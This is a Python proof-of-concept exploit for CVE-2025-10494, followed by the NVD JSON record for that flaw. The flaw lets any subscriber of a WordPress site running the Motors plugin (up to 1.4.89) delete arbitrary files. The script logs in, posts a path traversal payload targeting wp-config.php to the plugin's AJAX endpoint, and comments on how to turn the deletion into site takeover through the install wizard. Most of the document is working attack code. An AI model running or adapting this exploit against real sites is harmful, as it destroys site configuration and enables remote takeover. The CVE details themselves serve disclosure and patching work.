CVE-2025-10494

# CVE-2025-10494 PoC - Motors Plugin Arbitrary File Deletion # Vulnerability: Insufficient file path validation in profile picture deletion # Affected: Motors Plugin <= 1.4.89 # Auth required: Subscriber level or above import requests TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "password123" # Step 1: Login to WordPress as Subscriber session = requests.Session() # Get login page to retrieve nonce login_page = session.get(f"{TARGET_URL}/wp-login.php") # Perform login login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } session.post(f"{TARGET_URL}/wp-login.php", data=login_data) # Step 2: Exploit arbitrary file deletion via path traversal # The vulnerable endpoint processes the file path without validation target_file = "../../../wp-config.php" # Path traversal to delete wp-config.php delete_endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" exploit_data = { "action": "motors_delete_profile_picture", "image_id": target_file, # Malicious path traversal payload "nonce": "obtained_nonce_value" } response = session.post(delete_endpoint, data=exploit_data) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # After deletion of wp-config.php, site enters install wizard # Attacker can then reconfigure with malicious DB to achieve RCE print("\n[*] If successful, wp-config.php has been deleted.") print("[*] Access /wp-admin/install.php to reconfigure the site.")

{"cve": {"id": "CVE-2025-10494", "sourceIdentifier": "[email protected]", "published": "2025-10-08T04:16:11.527", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation when deleting profile pictures in all versions up to, and including, 1.4.89. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3369415%40motors-car-dealership-classified-listings%2Ftrunk&old=3367132%40motors-car-dealership-classified-listings%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e6066890-75b9-468d-9f67-78e93f58dcc1?source=cve", "source": "[email protected]"}]}}